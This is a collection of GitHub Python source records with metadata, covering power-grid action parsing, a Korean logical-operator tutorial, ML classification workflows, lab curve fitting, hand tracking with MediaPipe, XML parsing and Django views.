mode if necessary\n if debug:\n try:\n output_path = config[\"output_path\"]\n except:\n output_path = \"oracle4grid/output\" # os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../..\",'output')\n debug_directory = init_debug_directory(env_dir, action_file, chronic, output_path)\n else:\n debug_directory = None\n return atomic_actions, env, debug_directory, chronic_id\n\n\ndef init_debug_directory(env_dir, action_file, chronic, output_path = None):\n\n action_file_os = os.path.split(action_file)[len(os.path.split(action_file)) - 1].replace(\".json\", \"\")\n grid_file_os = os.path.split(env_dir)[len(os.path.split(env_dir)) - 1]\n scenario = \"scenario_\" + str(chronic)\n debug_directory = os.path.join(output_path, grid_file_os, scenario, action_file_os)\n os.makedirs(debug_directory, exist_ok=True)\n replay_debug_directory = os.path.join(debug_directory, \"replay_logs\")\n os.makedirs(replay_debug_directory, exist_ok=True)\n return debug_directory\n\nclass OracleParser():\n def __init__(self, d, action_space):\n self.d = d\n self.action_space = action_space\n self.parse = self.choose_parser_function()\n\n def choose_parser_function(self):\n if type(self.d) is list:\n if 'set_bus' in list(self.d[0].keys()):\n if 'substations_id' in list(self.d[0]['set_bus'].keys()):\n # Format 1 detected\n print(\"Specific format is detected for actions: converting with parser 1\")\n return self.parser1\n if type(self.d) is dict:\n if 'sub' in list(self.d.keys()) or 'line' in list(self.d.keys()):\n first_key = list(self.d.keys())[0]\n first_sub_or_line_id = list(self.d[first_key].keys())[0]\n if first_sub_or_line_id.isnumeric():\n if type(self.d[first_key][first_sub_or_line_id]) is list:\n first_action = self.d[first_key][first_sub_or_line_id][0]\n specific_key = list(first_action.keys())[0]\n if specific_key == \"set_configuration\":\n # Format 2 detected\n print(\"Specific format is detected for actions: converting with parser 2\")\n return self.parser2\n elif 
specific_key in list(ASSET_MAPPING.values()) or specific_key == \"set_line\":\n # Natural Oracle Format\n print(\"Natural Oracle format is detected for actions\")\n return self.parser0\n else:\n raise ValueError(\"json action dict is in an unknown format - action key \"+str(specific_key)+\" not handled\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n\n def parser0(self):\n return self.d\n\n def parser1(self):\n subs = set()\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n sub = sub_action[0]\n subs.add(sub)\n\n # init new dict with subs\n new_d = {'sub': {sub: [] for sub in subs}}\n\n # Pas bonne idée, parcourir dans la boucle\n grid = self.action_space.cls_to_dict()\n\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n subid = sub_action[0]\n sub_topo = sub_action[1]\n\n # On cherche les ids des gens, loads et lines_ex/or modifiées par l'action sub_topo (qui donne le nouveau bus)\n # Generators\n gen_ids = [id_ for id_, subid_ in enumerate(grid['gen_to_subid']) if\n subid_ == subid] # id des générateurs concernés par cette substation\n new_action_on_gens = {\"gens_id_bus\":\n [[id_, sub_topo[grid['gen_to_sub_pos'][id_]]] for id_ in gen_ids]\n # Couples id du générateur, nouveau bus donné par sub_topo\n }\n # Loads\n load_ids = [id_ for id_, subid_ in enumerate(grid['load_to_subid']) if\n subid_ == subid]\n new_action_on_loads = {\"loads_id_bus\":\n [[id_, sub_topo[grid['load_to_sub_pos'][id_]]] for id_ in load_ids]\n }\n # Lines origins and extremities gathered\n line_or_ids = [id_ for id_, subid_ in enumerate(grid['line_or_to_subid']) if\n subid_ == subid]\n line_ex_ids = [id_ for id_, subid_ in enumerate(grid['line_ex_to_subid']) if\n subid_ == subid]\n new_action_on_lines = {\"lines_id_bus\":\n [[id_, sub_topo[grid['line_or_to_sub_pos'][id_]]] for id_ in line_or_ids] + [\n [id_, sub_topo[grid['line_ex_to_sub_pos'][id_]]] for id_ in line_ex_ids]\n }\n new_action = {**new_action_on_loads, **new_action_on_gens, **new_action_on_lines}\n new_d['sub'][subid].append(new_action)\n # TODO: lines\n return new_d\n\n def parser2(self):\n new_dict = {line_or_sub:\n {id_: [] for id_ in self.d[line_or_sub]}\n for line_or_sub in self.d.keys()}\n for line_or_sub in self.d:\n for id_ in self.d[line_or_sub]:\n for original_action in self.d[line_or_sub][id_]:\n action = np.array(original_action['set_configuration'])\n asset_types, asset_ids, asset_actions = find_and_check_action_on_assets(action, self.action_space,\n line_or_sub, int(id_))\n unitary_action_dict = get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub)\n target_l = new_dict[line_or_sub][id_].copy()\n target_l.append(unitary_action_dict)\n new_dict[line_or_sub][id_] = target_l\n return new_dict\n\ndef find_and_check_action_on_assets(action, action_space, line_or_sub, id_):\n impact = action_space.from_vect(action).impact_on_objects()\n\n # Initialize list of results\n asset_types = []\n asset_ids = []\n asset_actions = []\n\n # In case the action is on sub, check it is the case and on the right sub\n # Then, extract infos on assets impacted\n if line_or_sub == 'sub':\n bus_impact = impact['topology']['assigned_bus']\n if len(bus_impact) == 0:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" doesnt impact substation bus\")\n else:\n for sub_action in bus_impact:\n if 
sub_action['substation'] != id_:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" impacts an other substation (sub number \"+str(sub_action['substation'])+\")\")\n else:\n asset_actions.append(int(sub_action['bus']))\n asset_ids.append(int(sub_action['object_id']))\n asset_types.append(ASSET_MAPPING[sub_action['object_type']])\n\n # In case it is line disconnection, just check it impacts the right line\n elif line_or_sub == \"line\":\n line_impact = impact['force_line']['disconnections']['powerlines']\n if len(line_impact) == 0:\n raise ValueError(\"Declared line action on line number\"+str(id_)+\" doesnt disconnect any line\")\n else:\n for line_id_disc in line_impact:\n if line_id_disc != id_:\n raise ValueError(\"Declared line disconnection on line number\"+str(id_)+\" impacts an other line (sub number \"+str(line_id_disc)+\")\")\n\n return asset_types, asset_ids, asset_actions\n\n\ndef get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub):\n if line_or_sub == \"sub\":\n d = dict()\n for asset_type, asset_id, asset_action in zip(asset_types, asset_ids, asset_actions):\n if asset_type in list(d.keys()):\n # update new sub action on this asset type\n action_on_asset = d[asset_type].copy()\n action_on_asset.append([asset_id, asset_action])\n d[asset_type] = action_on_asset\n else:\n # First action on this asset type\n d[asset_type] = [[asset_id, asset_action]]\n elif line_or_sub == \"line\":\n d = {\"set_line\":-1}\n return d\n","repo_name":"marota/Oracle4Grid","sub_path":"oracle4grid/core/utils/launch_utils.py","file_name":"launch_utils.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"40976302130","text":"\n'''\n* 논리 연산자 (&, |, and, or, not)\n\n# &, and: 좌항과 우항의 논리값이 모두 True일 경우에만 전체 결과 True 도출\n'''\na = 5\n\nif a > 1 and a < 10:\n print('asms 1~10 사이의 숫자가 아닙니다.')\nelse:\n print('a는 1~10 사이의 숫자가 아닙니다.')\n\n# 파이썬은 위의 식을 연결해서 작성 가능\nif 1 < a < 10:\n print('ok!')\n\n'''\n|, or: 좌항과 우항의 논리값이 한 쪽만 True여도 전체 결과 True 도출\n'''\n\n'''\n* 단축 평가 여산 (short circuit: and, or)\n- 좌항에서 전체 결과가 판명났을 경우 우항 연산을 진행하지 않는 연산자\n'''\n\nc = 0\n\nif(c == 0) or (10 / c == 5): # 우항에서 100% 에러가 나는 상황\n print('에러 없이 통과')\n\n# not 여산자는 논리값을 반전시킴\n\n'''\n- c언어에서는 정수 0을 False로 해석하고, \n0이 아닌 모든 정수를 True로 해석 (논리형 없음)\n파이썬에서도 C의 논리해석 그대로 적용 가능\n'''\n\napple = 5\nif not apple:\n print('사과가 하나도 없습니다.')\nelse:\n print('사과가', apple, '개 있습니다.')\n\n'''\n* 코딩도장 연습문제\n국어, 영어, 수학, 과학 점수가 있을 때 한 과목이라도 50점 미만이면 불합격,\n 다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요.\n'''\nkorean = 92\nenglish = 47\nmathematics = 86\nscience = 81\n\nif korean >= 50 and english >= 50 and mathematics >= 50 and science >= 50:\n print('합격')\nelse:\n print('불합격') \n\n'''\n* 코딩도장 퀴즈\n표준 입력으로 국어, 영어, 수학, 과학 점수가 입력됩니다. 국어는 90점 이상, \n영어는 80점 초과, 수학은 85점 초과, 과학은 80점 이상일 때 합격이라고 정했습니다\n(한 과목이라도 조건에 만족하지 않으면 불합격). \n다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요\n'''\nkor, eng, math, sc = map(int, input().split())\nprint( kor >= 90 and eng > 80 and math > 85 and sc >= 80)\n","repo_name":"suyeon0610/python","sub_path":"Basic/logical_operator.py","file_name":"logical_operator.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12042137392","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pandas as pd\nfrom multipledispatch import dispatch\n\nfrom ..constants import MLFLOW_ARTIFACT_DATA_PATH\nfrom ..model.classification import (\n ClassificationWorkflowBase,\n DecisionTreeClassification,\n ExtraTreesClassification,\n GradientBoostingClassification,\n KNNClassification,\n LogisticRegressionClassification,\n MLPClassification,\n RandomForestClassification,\n SVMClassification,\n XgboostClassification,\n)\nfrom ._base import ModelSelectionBase\n\n\nclass ClassificationModelSelection(ModelSelectionBase):\n \"\"\"Simulate the normal way of training classification algorithms.\"\"\"\n\n def __init__(self, model_name: str) -> None:\n self.model_name = model_name\n self.clf_workflow = ClassificationWorkflowBase()\n self.transformer_config = {}\n\n @dispatch(object, object, object, object, object, object)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n ) -> None:\n \"\"\"Train by Scikit-learn framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n hyper_parameters = SVMClassification.manual_hyper_parameters()\n self.clf_workflow = SVMClassification(\n kernel=hyper_parameters[\"kernel\"],\n degree=hyper_parameters[\"degree\"],\n gamma=hyper_parameters[\"gamma\"],\n C=hyper_parameters[\"C\"],\n shrinking=hyper_parameters[\"shrinking\"],\n )\n elif self.model_name == \"Decision Tree\":\n hyper_parameters = DecisionTreeClassification.manual_hyper_parameters()\n self.clf_workflow = DecisionTreeClassification(\n criterion=hyper_parameters[\"criterion\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n )\n elif self.model_name == \"Random Forest\":\n hyper_parameters = RandomForestClassification.manual_hyper_parameters()\n self.clf_workflow = RandomForestClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Xgboost\":\n hyper_parameters = XgboostClassification.manual_hyper_parameters()\n self.clf_workflow = XgboostClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n subsample=hyper_parameters[\"subsample\"],\n colsample_bytree=hyper_parameters[\"colsample_bytree\"],\n alpha=hyper_parameters[\"alpha\"],\n lambd=hyper_parameters[\"lambd\"],\n )\n elif self.model_name == \"Logistic Regression\":\n hyper_parameters = 
LogisticRegressionClassification.manual_hyper_parameters()\n self.clf_workflow = LogisticRegressionClassification(\n penalty=hyper_parameters[\"penalty\"],\n C=hyper_parameters[\"C\"],\n solver=hyper_parameters[\"solver\"],\n max_iter=hyper_parameters[\"max_iter\"],\n class_weight=hyper_parameters[\"class_weight\"],\n l1_ratio=hyper_parameters[\"l1_ratio\"],\n )\n elif self.model_name == \"Multi-layer Perceptron\":\n hyper_parameters = MLPClassification.manual_hyper_parameters()\n self.clf_workflow = MLPClassification(\n hidden_layer_sizes=hyper_parameters[\"hidden_layer_sizes\"],\n activation=hyper_parameters[\"activation\"],\n solver=hyper_parameters[\"solver\"],\n alpha=hyper_parameters[\"alpha\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_iter=hyper_parameters[\"max_iter\"],\n )\n elif self.model_name == \"Extra-Trees\":\n hyper_parameters = ExtraTreesClassification.manual_hyper_parameters()\n self.clf_workflow = ExtraTreesClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Gradient Boosting\":\n hyper_parameters = GradientBoostingClassification.manual_hyper_parameters()\n self.clf_workflow = GradientBoostingClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n subsample=hyper_parameters[\"subsample\"],\n loss=hyper_parameters[\"loss\"],\n )\n elif self.model_name == \"K-Nearest Neighbors\":\n hyper_parameters = KNNClassification.manual_hyper_parameters()\n self.clf_workflow = KNNClassification(\n n_neighbors=hyper_parameters[\"n_neighbors\"],\n weights=hyper_parameters[\"weights\"],\n algorithm=hyper_parameters[\"algorithm\"],\n leaf_size=hyper_parameters[\"leaf_size\"],\n p=hyper_parameters[\"p\"],\n metric=hyper_parameters[\"metric\"],\n )\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train)\n y_test_predict = self.clf_workflow.predict(X_test)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n self.clf_workflow.save_hyper_parameters(hyper_parameters, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components()\n\n # Special components of different algorithms\n self.clf_workflow.special_components()\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save()\n\n @dispatch(object, object, object, object, object, object, bool)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: 
pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n is_automl: bool,\n ) -> None:\n \"\"\"Train by FLAML framework + RAY framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n self.clf_workflow = SVMClassification()\n elif self.model_name == \"Decision Tree\":\n self.clf_workflow = DecisionTreeClassification()\n elif self.model_name == \"Random Forest\":\n self.clf_workflow = RandomForestClassification()\n elif self.model_name == \"Xgboost\":\n self.clf_workflow = XgboostClassification()\n elif self.model_name == \"Logistic Regression\":\n self.clf_workflow = LogisticRegressionClassification()\n elif self.model_name == \"Multi-layer Perceptron\":\n self.clf_workflow = MLPClassification()\n elif self.model_name == \"Extra-Trees\":\n self.clf_workflow = ExtraTreesClassification()\n elif self.model_name == \"Gradient Boosting\":\n self.clf_workflow = GradientBoostingClassification()\n elif self.model_name == \"K-Nearest Neighbors\":\n self.clf_workflow = KNNClassification()\n\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train, is_automl)\n y_test_predict = self.clf_workflow.predict(X_test, is_automl)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n if self.clf_workflow.ray_best_model is not None:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.ray_best_model.get_params(), self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n else:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.automl.best_config, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components(is_automl)\n\n # Special components of different algorithms\n self.clf_workflow.special_components(is_automl)\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save(is_automl)\n","repo_name":"ZJUEarthData/geochemistrypi","sub_path":"geochemistrypi/data_mining/process/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"}
+{"seq_id":"44250696471","text":"from lab_framework import Manager, analysis\nfrom numpy import sin, cos, deg2rad, inf\nimport matplotlib.pyplot as plt\n\ndef fit_func(theta, phi, alpha, N, C):\n return N*(cos(deg2rad(alpha))**2 - 0.5*cos(2*deg2rad(alpha))*sin(2*deg2rad(theta-phi))**2) + C\n\nif __name__ == '__main__':\n \n TRIAL = 2\n SWEEP_PARAMS = [-15, -3, 30, 5, 3]\n UVHWP_ANGLE = 0\n\n '''\n # initialize the manager\n m = Manager(config='../config.json')\n\n # log session info\n m.log(f'AQWP.py TRIAL # {TRIAL}; SWEEP PARAMS = {SWEEP_PARAMS}; UVHWP ANGLE = {UVHWP_ANGLE}')\n\n # configure the UVHWP to produce _something_\n m.C_UV_HWP.goto(UVHWP_ANGLE)\n\n # sweep alice's quarter waveplate\n m.sweep('A_QWP', *SWEEP_PARAMS)\n\n # get the output\n df = m.output_data(f'AQWP_sweep{TRIAL}.csv')\n m.shutdown()\n '''\n\n df = Manager.load_data('AQWP_sweep1.csv')\n \n # fit the function\n params = analysis.fit(fit_func, df['A_QWP'], df['C4'], p0=[0, 90.1518, 2423, -46], bounds=[[-180, -180, -inf, -inf], [180, 180, inf, inf]], maxfev=1000)\n # params = analysis.fit('quadratic', df['A_QWP'], df['C4'])\n\n # print fitted parameters\n print(f'Fit parameters = {params}')\n\n # plotting\n # analysis.plot_func('quadratic', params, df['A_QWP'], color='b', linestyle='dashed', label=f'Fit Function', alpha=0.3)\n fig = plt.figure(figsize=(9,6))\n ax = fig.add_subplot(1,1,1)\n analysis.plot_func(fit_func, params, df['A_QWP'], color='b', linestyle='dashed', label=f'${params[2].n:.3f}[\\\\cos^2({params[1].n:.3f})+\\\\cos(2\\\\cdot{params[1].n:.3f})\\\\sin^2(2(\\\\theta{params[0].n:.3f}))/2]+{params[3].n:.3f}$', alpha=0.3)\n analysis.plot_errorbar(df['A_QWP'], df['C4'], ms=0.1, fmt='ro', capsize=2, label='Data')\n plt.xlabel('Alice\\'s QWP Angle (degrees)')\n plt.ylabel('Count Rate (#/s)')\n plt.legend()\n # plt.title(f'Fit=${params[1].n:.3f}(x-{params[0].n:.3f})^2 + {params[2].n:.3f}$')\n plt.title(f'Alice QWP Sweep')\n plt.savefig(f'AQWP_fit.png', dpi=600)\n plt.show()\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"calibration/AQWP/AQWP_fit.py","file_name":"AQWP_fit.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38117359183","text":"from gekko import GEKKO\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n### Code for this project was written by Brent M. Lund ###\r\n\r\nfor num in range(1, 10): #This is Amdahl's Law\r\n variable = 1 / num #variable represents the percentage change for the equation or fraction enhanced\r\n variable1 = (1 - variable) # 1 - by the fraction enhanced\r\n variable2 = (variable / num) #fraction enhanced / number of core processors\r\n variable3 = variable1 + variable2 #Variable1 was added to variable2\r\n variable4 = 1 / variable3 #divided one by the final product of variable 3\r\n print(\"Processor cores Added: \", num)\r\n print(\"Final Point of Amdel's Law: \", variable4)\r\n\r\nresult = [1, 1.3333, 1.28, 1.23, 1.19, 1.16, 1.13, 1.12]\r\nplt.plot(result)\r\nplt.show()\r\n\r\nprint(\"An Amdel Law derivative: \")\r\ndef Amdel_Law_derivative(derivative): #derivitave of Amdel's_Law\r\n k = .03\r\n derivative_V = derivative * (derivative + 1) #multiplied fraction enhanced with-\r\n derivative_X = (derivative - (derivative - 1 *(k))) #the number of core processors\r\n derivative_Y = (derivative_X) * (derivative_X) #the number of core processors-\r\n derivative_Z = derivative_V / derivative_Y\r\n #subtracted it by fraction enhanced\r\n #multiplied this result by itself\r\n print(derivative_Z)\r\n\r\nAmdel_Law_derivative(1)\r\nAmdel_Law_derivative(2)\r\nAmdel_Law_derivative(3)\r\nAmdel_Law_derivative(4)\r\nAmdel_Law_derivative(5)\r\nAmdel_Law_derivative(6)\r\nAmdel_Law_derivative(7)\r\nAmdel_Law_derivative(8)\r\n\r\n# function that returns dy/dt\r\ndef model(y, t): #applied my derivative of Amdel's_Law above-\r\n #and plugged it into the model function\r\n dev_v = y * (y + 1)\r\n dev_x = (y - (y - 1 * (.03)))\r\n dev_y = (dev_x) * (dev_x)\r\n dev_z = dev_v / dev_y\r\n dydt = dev_z\r\n return dydt\r\n\r\n# initial condition\r\ny0 = 1\r\n\r\n# time points\r\nt = np.linspace(0, 1000) # shows my eleven points between 0 and 10\r\n\r\ny = odeint(model, y0, t)\r\n\r\n# plot results\r\nplt.plot(t, y)\r\nplt.xlabel('time')\r\nplt.ylabel('y(t)')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Myron000/CST-305","sub_path":"Amdel's_Law.py","file_name":"Amdel's_Law.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2914359549","text":"import subprocess\nimport sys\nimport os\n\npackages = [\n \"statsmodels==0.11.1\",\n \"xgboost==0.90\",\n \"numpy==1.16.1\",\n \"glibc\",\n \"lxml\",\n \"sklearn-pandas\",\n \"lightgbm\",\n \"pandas\",\n \"numpy\",\n \"pytest-cov\",\n \"pytest\",\n \"codecov\",\n \"xmlschema\",\n \"scikit-learn==0.23.1\"\n]\n\ndef installPackage(package):\n subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", package])\n\nif __name__ == \"__main__\":\n for pck in packages:\n installPackage(pck)","repo_name":"mohammedfazil003/nyoka","sub_path":"nyoka/tests/_install_dependencies.py","file_name":"_install_dependencies.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"595773134","text":"#!/usr/bin/env python3\n\nimport sys\n\nif len(sys.argv) > 1:\n f = open( sys.argv[1] )\nelse:\n f = sys.stdin\n#just open file of interest with standard argument, first part is unnecessary \nfor line in f:\n if \"DROME\" in line:\n #drome refers to correct species\n fields = line.rstrip(\"\\r\\n\").split()\n #whitespace deliniation\n if fields[-1].startswith(\"FBgn\"):\n #look at the last column, they have to start with the FBgn to be counted in the printed dataset\n print(fields[3] + \" \" + fields[2])\n #prints two columns, first has flybase ID and second has uniprot ID","repo_name":"clmcnerney/qbb2018-answers","sub_path":"day2-homework/day2-homework-1.py","file_name":"day2-homework-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"52345756506","text":"import mediapipe\nimport cv2\nmedhands=mediapipe.solutions.hands\ndraw=mediapipe.solutions.drawing_utils\nhands=medhands.Hands(max_num_hands=1,min_detection_confidence=0.7)\n\ncap=cv2.VideoCapture(0)\nwhile True:\n success,img=cap.read()\n img=cv2.flip(img,1)\n imgrgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n res=hands.process(imgrgb)\n \n cv2.rectangle(img,(20,350),(90,440),(0,255,0),cv2.FILLED)\n tipids=[4,8,12,16,20]\n lmlist=[]\n\n if res.multi_hand_landmarks:\n for handlms in res.multi_hand_landmarks:\n for id,lm in enumerate(handlms.landmark):\n cx=lm.x\n cy=lm.y\n lmlist.append([id,cx,cy])\n \n if len(lmlist)!=0 and len(lmlist)==21:\n\n fingerlist=[]\n\n for i in range(0,5):\n\n if lmlist[tipids[i]][2]>>> could not print text')\r\n for item in node:\r\n getXMLData(item)\r\n else:\r\n return 0\r\n \r\n \r\ndef scan(): \r\n tree = etree.parse(xml_45_CFR_Section_11_10)\r\n root = tree.getroot()\r\n getXMLData(root)\r\n #print (g)\r\n \r\ndef main(): \r\n scan()\r\n \r\nif __name__ == \"__main__\": \r\n # calling main function \r\n main() \r\n\r\n\r\n","repo_name":"noblecook/research","sub_path":"PhDProject/edu/ttu/phd/tacm/RegulationTrainingSet.py","file_name":"RegulationTrainingSet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"70103136008","text":"import re\n\nfrom django.db.models import F, Q, Sum\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.http import urlencode\nfrom orm.models import Build, Target, Task, Layer, Layer_Version, Recipe\nfrom orm.models import LogMessage, Variable, Package_Dependency, Package\nfrom orm.models import Task_Dependency, Package_File\nfrom orm.models import Target_Installed_Package, Target_File\nfrom orm.models import TargetKernelFile, TargetSDKFile, Target_Image_File\nfrom orm.models import BitbakeVersion, CustomImageRecipe\n\nfrom django.urls import reverse, resolve\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseNotFound, JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta, datetime\nfrom toastergui.templatetags.projecttags import json as jsonfilter\nfrom decimal import Decimal\nimport json\nimport os\nfrom os.path import dirname\nimport mimetypes\n\nimport logging\n\nfrom toastermain.logs import log_view_mixin\n\nlogger = logging.getLogger(\"toaster\")\n\n# Project creation and managed build enable\nproject_enable = ('1' == os.environ.get('TOASTER_BUILDSERVER'))\nis_project_specific = ('1' == os.environ.get('TOASTER_PROJECTSPECIFIC'))\n\nclass MimeTypeFinder(object):\n # setting this to False enables additional non-standard mimetypes\n # to be included in the guess\n _strict = False\n\n # returns the mimetype for a file path as a string,\n # or 'application/octet-stream' if the type couldn't be guessed\n @classmethod\n def get_mimetype(self, path):\n guess = mimetypes.guess_type(path, self._strict)\n guessed_type = guess[0]\n if guessed_type is None:\n guessed_type = 'application/octet-stream'\n return guessed_type\n\n# single point to add global values into the context before rendering\n@log_view_mixin\ndef toaster_render(request, page, context):\n context['project_enable'] = project_enable\n context['project_specific'] = is_project_specific\n return render(request, page, context)\n\n\n# all new sessions should come through the landing page;\n# determine in which mode we are running in, and redirect appropriately\ndef landing(request):\n # in build mode, we redirect to the command-line builds page\n # if there are any builds for the default (cli builds) project\n default_project = Project.objects.get_or_create_default_project()\n default_project_builds = Build.objects.filter(project = default_project)\n\n # we only redirect to projects page if there is a user-generated project\n num_builds = Build.objects.all().count()\n user_projects = Project.objects.filter(is_default = False)\n has_user_project = user_projects.count() > 0\n\n if num_builds == 0 and has_user_project:\n return redirect(reverse('all-projects'), permanent = False)\n\n if num_builds > 0:\n return redirect(reverse('all-builds'), permanent = False)\n\n context = {'lvs_nos' : Layer_Version.objects.all().count()}\n\n return toaster_render(request, 'landing.html', context)\n\ndef objtojson(obj):\n from django.db.models.query import QuerySet\n from django.db.models import Model\n\n if isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, timedelta):\n return obj.total_seconds()\n elif isinstance(obj, 